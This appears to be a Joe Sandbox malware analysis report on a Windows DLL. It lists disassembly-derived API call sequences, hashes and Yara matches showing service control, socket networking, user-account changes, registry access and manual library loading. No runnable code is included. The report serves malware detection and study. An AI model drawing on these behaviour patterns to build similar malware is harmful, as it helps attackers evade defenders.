• Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
Similarity
• API ID: #6874$#800#858
• String ID:
• API String ID: 833685189-0
• Opcode ID: 8fba9978fbcacef4305ec62f9d20de837d23ef3cff7f8932171e12680254217a
• Instruction ID: 01b43e94da0ea2eb4e39674b02d587f3c921b09ce4ba7a4e708dea5c2d38b77a
• Opcode Fuzzy Hash: 8fba9978fbcacef4305ec62f9d20de837d23ef3cff7f8932171e12680254217a
• Instruction Fuzzy Hash: A401F471208B82AAC704CF54EA15F9AFBD5EB90B60F00063EF0A5476D1DB74E9088392
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000001,00000000,1001FB22,1011EC82,?,?,?,?,?,?,?,?), ref: 1001FEE7
• OpenServiceA.ADVAPI32(00000000,?,00020000,?,?,?,?,?,?,?,?), ref: 1001FF00
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 1001FF0B
Similarity
• API ID: OpenService$CloseHandleManager
• String ID:
• API String ID: 4136619037-0
• Opcode ID: 9b0dc5b076fce1cf9a16b774a2a7847931855da1db67cd2e176fee473d4c4fbc
• Instruction ID: efb21d9ce1343172679c2ebe97ca72b077adbb798532605da40d3010ccc8a93c
• Opcode Fuzzy Hash: 9b0dc5b076fce1cf9a16b774a2a7847931855da1db67cd2e176fee473d4c4fbc
• Instruction Fuzzy Hash: 30E09236219231A7E2217729BC88FDB67A8EFD9791F0B0156F608DA190C6A0D88245E8
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,?,10028552), ref: 10027267
• OpenServiceA.ADVAPI32(00000000,?,00010010,?,00000065), ref: 10027280
• StartServiceA.ADVAPI32(00000000,00000000,00000000,?,00000065), ref: 10027297
• CloseServiceHandle.ADVAPI32(00000000,?,00000065), ref: 1002729E
• CloseServiceHandle.ADVAPI32(00000000,?,00000065), ref: 100272A1
Similarity
• API ID: Service$CloseHandleOpen$ManagerStart
• String ID:
• API String ID: 1485051382-0
• Opcode ID: de2cff0e2183aa8c2048c1ea4d6f503d246575146b3d388905ddcafbe7147248
• Instruction ID: a991dfd3618a091cf8bced06e1e14c92db115e9186b32fce010f6c8dd9d2edbc
• Opcode Fuzzy Hash: de2cff0e2183aa8c2048c1ea4d6f503d246575146b3d388905ddcafbe7147248
• Instruction Fuzzy Hash: 1AE09B35256621BBF22167149CC5FAB2678FB8DBD0F150205F608961C0CB609C0141AD
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
• CancelIo.KERNEL32(?), ref: 10004F57
• InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
• closesocket.WS2_32(?), ref: 10004F73
• SetEvent.KERNEL32(?), ref: 10004F80
Similarity
• API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
• String ID:
• API String ID: 1486965892-0
• Opcode ID: 6626a22e340417a29348b83b411036a0a6be5876ad5ce8627d14265979501e30
• Instruction ID: 7b5b089ba35ea6fa801320ef26441ee9f6e0eb5430616a3962164302b2279ec7
• Opcode Fuzzy Hash: 6626a22e340417a29348b83b411036a0a6be5876ad5ce8627d14265979501e30
• Instruction Fuzzy Hash: 81F01275214711AFE6248F64CC88FD777A8BF45711F108B1DF6AE462D0CB70A4488755
APIs
• LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,00000000,00000000), ref: 10005B96
• GetProcAddress.KERNEL32(00000000), ref: 10005B9D
Similarity
• API ID: AddressLibraryLoadProc
• String ID: KERNEL32.dll$WideCharToMultiByte
• API String ID: 2574300362-2634761684
• Opcode ID: 3f2dff838d6c50b6e35792f9c3f23f1c7ba8e3bb5a943dbf87fe4b46237b9eb9
• Instruction ID: 11a70ebfe6614348c4627575f714f8bac5bc37e03cfb6a5d127c6c7937c6bce2
• Opcode Fuzzy Hash: 3f2dff838d6c50b6e35792f9c3f23f1c7ba8e3bb5a943dbf87fe4b46237b9eb9
• Instruction Fuzzy Hash: 2541257250421A8FDB18CE2CC8549AFBBD5FBC4354F154A2DF9A6D3280DA70AD0ACB91
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100108E8
• Sleep.KERNEL32(000004D2), ref: 1001098C
  • Part of subcall function 10010790: CloseHandle.KERNEL32(00000000), ref: 10010893
• DeleteFileA.KERNEL32(?), ref: 1001094D
  • Part of subcall function 10010790: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100107C2
  • Part of subcall function 10010790: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10010837
  • Part of subcall function 10010790: GetFileSize.KERNEL32(00000000,00000000), ref: 10010846
  • Part of subcall function 10010790: #823.MFC42(00000000), ref: 1001084F
  • Part of subcall function 10010790: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10010862
  • Part of subcall function 10010790: #825.MFC42(00000000), ref: 1001088A
Similarity
• API ID: File$DirectorySystem$#823#825CloseCreateDeleteHandleReadSizeSleep
• String ID: .key
• API String ID: 3115437274-343438762
• Opcode ID: a96574d81c46762344fc3343623d057d93ebf2ababc3c40e8b4745195a2ba852
• Instruction ID: 6c8f07c80318120aef5ae7d44ab656afb01d193eb1c0889538d79381634ba695
• Opcode Fuzzy Hash: a96574d81c46762344fc3343623d057d93ebf2ababc3c40e8b4745195a2ba852
• Instruction Fuzzy Hash: 1E210775B046540BE719D634889076A7BC5FBC1330F58031AF6978B2C2CEF898888755
APIs
• SHGetSpecialFolderPathA.SHELL32 ref: 10007877
• CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 100078ED
• CloseHandle.KERNEL32(00000000), ref: 10007917
Similarity
• API ID: CloseCreateFileFolderHandlePathSpecial
• String ID: p
• API String ID: 3113538180-2181537457
• Opcode ID: 5da1870f2322d6a31bcdac28cb17ebf9f43366c6ecd2797be473c450de5ccda1
• Instruction ID: fb9301c769810b0d049b01ddbf7940714647d0c15556b6550ef7852ede3c4a13
• Opcode Fuzzy Hash: 5da1870f2322d6a31bcdac28cb17ebf9f43366c6ecd2797be473c450de5ccda1
• Instruction Fuzzy Hash: CB210A716006041FE718CA389C46BEB76C5FBC4330F588B2DF96ACB2D1DAF489098750
APIs
• LoadLibraryA.KERNEL32(WINMM.dll,waveOutWrite), ref: 1000141E
• GetProcAddress.KERNEL32(00000000), ref: 10001425
  • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutOpen), ref: 100014C9
  • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014D2
  • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutPrepareHeader), ref: 100014E2
  • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014E5
  • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutGetNumDevs), ref: 100014F5
  • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014F8
Similarity
• API ID: AddressLibraryLoadProc
• String ID: WINMM.dll$waveOutWrite
• API String ID: 2574300362-665518901
• Opcode ID: 4a4c6bc64acc4bfc1f0c5e94051bfa256714ece8f52ffe926b99e450b8b27139
• Instruction ID: 94ba89aa586d5954ea77ca1480e0960dd09743874461cbc46f4ab6b518109010
• Opcode Fuzzy Hash: 4a4c6bc64acc4bfc1f0c5e94051bfa256714ece8f52ffe926b99e450b8b27139
• Instruction Fuzzy Hash: C211A0762043048FEB08DF68D8C89A6BBE5FB88380B15855DFE468B346DB71EC01DB20
APIs
• SetFilePointer.KERNEL32(?,?,?,00000000,?,?,00000065,?,00000001,00000001,00000001), ref: 10009DAA
• WriteFile.KERNEL32(?,?,?,?,00000000,?,00000065,?,00000001,00000001,00000001), ref: 10009DC6
• SetFilePointer.KERNEL32 ref: 10009DE4
Similarity
• API ID: File$Pointer$Write
• String ID: p
• API String ID: 3847668363-2181537457
• Opcode ID: aa322e81eecda5844740ab48266e82d2f9faeacbe78758d31681d1f169d9bd49
• Instruction ID: 1a9338856e1de5b0d7c3f8fb7aa3c1ae0f192f66fa92f10234f7d2b8d6558fe2
• Opcode Fuzzy Hash: aa322e81eecda5844740ab48266e82d2f9faeacbe78758d31681d1f169d9bd49
• Instruction Fuzzy Hash: 811127B5608341ABE210DB28CC85F9BB7E9FBD8714F108A0CF99893280D674A9058BA1
APIs
  • Part of subcall function 10001B80: InitializeCriticalSection.KERNEL32(00000001,?,100048DA,00000000), ref: 10001B98
• WSAStartup.WS2_32(00000202,?), ref: 1000491D
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                  Similarity
                                                  • API ID: CreateCriticalEventInitializeSectionStartup
                                                  • String ID: a$m
                                                  • API String ID: 1327880603-1958708294
                                                  APIs
                                                  • #823.MFC42(00000014,0036EE80,00000000,?,?,?,?,?,?,?,?,?,?,?,10028BA4,?), ref: 100251B7
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 100251DB
                                                  • wsprintfA.USER32 ref: 10025201
                                                  • API ID: #823GlobalMemoryStatuswsprintf
                                                  • String ID: @
                                                  • API String ID: 1983843647-2766056989
                                                  APIs
                                                  • #823.MFC42(00000014,753F0450,00000000,?,?,?,?,?,?,?,?,?,?,?,10028BC0,00000000), ref: 10025D57
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 10025D7B
                                                  • wsprintfA.USER32 ref: 10025DA1
                                                  • API ID: #823GlobalMemoryStatuswsprintf
                                                  • String ID: @
                                                  • API String ID: 1983843647-2766056989
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 1002C581
                                                  • GetThreadDesktop.USER32(00000000,?,100175AC), ref: 1002C588
                                                    • Part of subcall function 1002BFA0: LoadLibraryA.KERNEL32(USER32.dll,OpenDesktopA,?,?,00000000,1002BD69,00000000), ref: 1002BFBB
                                                    • Part of subcall function 1002BFA0: GetProcAddress.KERNEL32(00000000), ref: 1002BFC4
                                                  • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 1002C5B4
                                                  • API ID: Thread$AddressCurrentDesktopLibraryLoadMessagePostProc
                                                  • String ID: Winlogon
                                                  • API String ID: 133172028-744610081
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CreateEventA$KERNEL32.dll
                                                  • API String ID: 2574300362-2476775342
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CloseHandle,00000000,1000F45B,00000000,00000000,1001DDE5), ref: 10010A23
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10010A2A
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CloseHandle$KERNEL32.dll
                                                  • API String ID: 2574300362-2295661983
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 1002C05A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002C061
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: KERNEL32.dll$lstrlenA
                                                  • API String ID: 2574300362-1796993502
                                                  • API ID:
                                                  • String ID: $u%04x
                                                  • API String ID: 0-2846719512
                                                  APIs
                                                  • #825.MFC42(?,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121D1
                                                  • #823.MFC42(00000000,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121F6
                                                    • Part of subcall function 10012350: #540.MFC42(00000000,?,?,00000000), ref: 100123A6
                                                    • Part of subcall function 10012350: #540.MFC42(00000000,?,?,00000000), ref: 100123B3
                                                  • API ID: #540$#823#825
                                                  • String ID:
                                                  • API String ID: 3261958014-0
                                                  APIs
                                                  • #825.MFC42(00000000), ref: 10016211
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989E8,000000FF), ref: 10016221
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989E8,000000FF), ref: 100161BC
                                                    • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                  • #825.MFC42(?), ref: 100162A9
                                                  • API ID: #823#825$Open
                                                  • String ID:
                                                  • API String ID: 2004829228-0
                                                  APIs
                                                  • #825.MFC42(00000000), ref: 10015EB1
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989A8,000000FF), ref: 10015EC1
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989A8,000000FF), ref: 10015E5C
                                                    • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                  • #825.MFC42(?), ref: 10015F49
                                                  • API ID: #823#825$Open
                                                  • String ID:
                                                  • API String ID: 2004829228-0
                                                  • Opcode ID: 98d1ea1c1581cd519bd7374e915b54f43815529a85f16872e6a8df6bbadbb9b5
                                                  • Instruction ID: 574233531b69ffa773c96334ab38d7ffb47452367a12adbc4b9678ea1af9b19e
                                                  • Opcode Fuzzy Hash: 98d1ea1c1581cd519bd7374e915b54f43815529a85f16872e6a8df6bbadbb9b5
                                                  • Instruction Fuzzy Hash: 72410275604645DBC708DE28C891A6BB3D5FBC8611F88052CF9568F341EB36EA49C793
                                                  APIs
                                                  • #825.MFC42(00000000), ref: 10015CE3
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,10098988), ref: 10015CF7
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,10098988), ref: 10015C88
                                                    • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                  • #825.MFC42(00000000), ref: 10015D76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823#825$Open
                                                  • String ID:
                                                  • API String ID: 2004829228-0
                                                  • Opcode ID: a3a86b5ae27979fa43b838ab37d574446342f0cec2a0c29d713b066fcb1d0e54
                                                  • Instruction ID: 69ba1ccd52ce603d4bfe7cb3c909db8bba42efaff23af766ddf8a04ce65b47fd
                                                  • Opcode Fuzzy Hash: a3a86b5ae27979fa43b838ab37d574446342f0cec2a0c29d713b066fcb1d0e54
                                                  • Instruction Fuzzy Hash: B841FD35604645DFC708DE28D89166FB3E6FBC8610F88052CF9469B351DB32E989CB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823$strstr
                                                  • String ID:
                                                  • API String ID: 3700887599-0
                                                  • Opcode ID: 1feb712d2eb87b772129509cba575338db839c6f83ad0c279dda09971329dd7f
                                                  • Instruction ID: e7a3bb7836f99c4b21098aa8e2ae082227a5993f95023b9609139f1e4e40139e
                                                  • Opcode Fuzzy Hash: 1feb712d2eb87b772129509cba575338db839c6f83ad0c279dda09971329dd7f
                                                  • Instruction Fuzzy Hash: 1721AD3A2105180B871CC97DAC1152B7AC2FBC9631B6A432EFA2BC7BD1DEA5DD058380
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 10006D7E
                                                  • LoadLibraryA.KERNEL32(?), ref: 10006D9A
                                                    • Part of subcall function 100069B0: GetProcessHeap.KERNEL32(00000000,?,?), ref: 100069C0
                                                    • Part of subcall function 100069B0: HeapReAlloc.KERNEL32(00000000), ref: 100069C7
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 10006E08
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 10006E2F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapRead$AddressAllocLibraryLoadProcProcess
                                                  • String ID:
                                                  • API String ID: 2932169029-0
                                                  • Opcode ID: 0bb20e24d639ff234c6774ad8937788d10a102b94a8500d5cb44c64d04d593d7
                                                  • Instruction ID: 24d0788afd7e564c21ce07679b2cd919d25d482a3edf121e110520330544f2d5
                                                  • Opcode Fuzzy Hash: 0bb20e24d639ff234c6774ad8937788d10a102b94a8500d5cb44c64d04d593d7
                                                  • Instruction Fuzzy Hash: 2C317E76B007069FE310CF29CC80A56B7E9FF493A4B26462AE919C7255EB31E815CB90
                                                  APIs
                                                  • ceil.MSVCRT ref: 10001D8C
                                                  • _ftol.MSVCRT ref: 10001D95
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,?,?,?,?,?,?,1001B646,?,000003C0), ref: 10001DA9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual_ftolceil
                                                  • String ID:
                                                  • API String ID: 3317677364-0
                                                  • Opcode ID: a938f9c99390067515d5bb401682070dd3e948cd9475bed688cee5d7a00ad51b
                                                  • Instruction ID: 80e73f680275ecb85cea3faadb907318f444ef36128b6434ffe1c43a84600ab4
                                                  • Opcode Fuzzy Hash: a938f9c99390067515d5bb401682070dd3e948cd9475bed688cee5d7a00ad51b
                                                  • Instruction Fuzzy Hash: 9911E4757083009BE704DF28EC8275ABBE4FBC03A1F04853EFD498B395DA75A809CA65
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _ftolceil
                                                  • String ID:
                                                  • API String ID: 2006273141-0
                                                  • Opcode ID: c13413cdfef608f17b66785ed65de3a9914b1a525c6f880948e7d8bc7dc34384
                                                  • Instruction ID: 62e5b31a19e4efc706719f2d7f8223bc0b5f5341a1f9df7ec71081677a67e64d
                                                  • Opcode Fuzzy Hash: c13413cdfef608f17b66785ed65de3a9914b1a525c6f880948e7d8bc7dc34384
                                                  • Instruction Fuzzy Hash: 2911A2756483049BE704EF28EC8676FBBE1FB84791F04853DF9498B344DA36A818C666
                                                  APIs
                                                  • LocalSize.KERNEL32(00000000), ref: 10015AAE
                                                  • LocalFree.KERNEL32(00000000), ref: 10015ABA
                                                  • LocalSize.KERNEL32(00000000), ref: 10015AD5
                                                  • LocalFree.KERNEL32(00000000), ref: 10015AE1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$FreeSize
                                                  • String ID:
                                                  • API String ID: 2726095061-0
                                                  • Opcode ID: c0206f096c02150c192f086eedc162ceac66f92a3276f0c0eb43a5dbeb93a699
                                                  • Instruction ID: 9d4eaa0da794f1e2b3889d11efc9f421fde940f342979db69ca44634e0eb0258
                                                  • Opcode Fuzzy Hash: c0206f096c02150c192f086eedc162ceac66f92a3276f0c0eb43a5dbeb93a699
                                                  • Instruction Fuzzy Hash: 2E11EEB9204654DBC221DB14CC91BBFB3D8FF85251F880629F9915F281DF39EC8586AA
                                                  APIs
                                                  • mbstowcs.MSVCRT ref: 10025257
                                                  • NetUserSetInfo.NETAPI32(00000000,?,000003F0,?,00000000,?,?,?), ref: 1002528E
                                                  • Sleep.KERNEL32(00000064,00000000,?,000003F0,?,00000000,?,?,?), ref: 100252B2
                                                    • Part of subcall function 10025700: LocalSize.KERNEL32(00000000), ref: 10025710
                                                    • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
                                                  • LocalFree.KERNEL32(?,?,?,?), ref: 100252C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$Free$InfoSizeSleepUsermbstowcs
                                                  • String ID:
                                                  • API String ID: 2733533-0
                                                  • Opcode ID: 6a9604ccc34c4b0797383264fcae3a00f4c44b13357fa65a3340c00f3e20fbd0
                                                  • Instruction ID: 15c901b137dd358fda9146c8f6f94cc6f523190a05e50031364fc71d2f867a2a
                                                  • Opcode Fuzzy Hash: 6a9604ccc34c4b0797383264fcae3a00f4c44b13357fa65a3340c00f3e20fbd0
                                                  • Instruction Fuzzy Hash: 02110835218301ABE714CB28DC85FDB77D9AFD8705F044A2DF585822D1EBB4E54C8693
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                  • CloseHandle.KERNEL32(?), ref: 100049FF
                                                  • CloseHandle.KERNEL32(?), ref: 10004A08
                                                  • WSACleanup.WS2_32 ref: 10004A0A
                                                    • Part of subcall function 10004F20: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                    • Part of subcall function 10004F20: CancelIo.KERNEL32(?), ref: 10004F57
                                                    • Part of subcall function 10004F20: InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                    • Part of subcall function 10004F20: closesocket.WS2_32(?), ref: 10004F73
                                                    • Part of subcall function 10004F20: SetEvent.KERNEL32(?), ref: 10004F80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
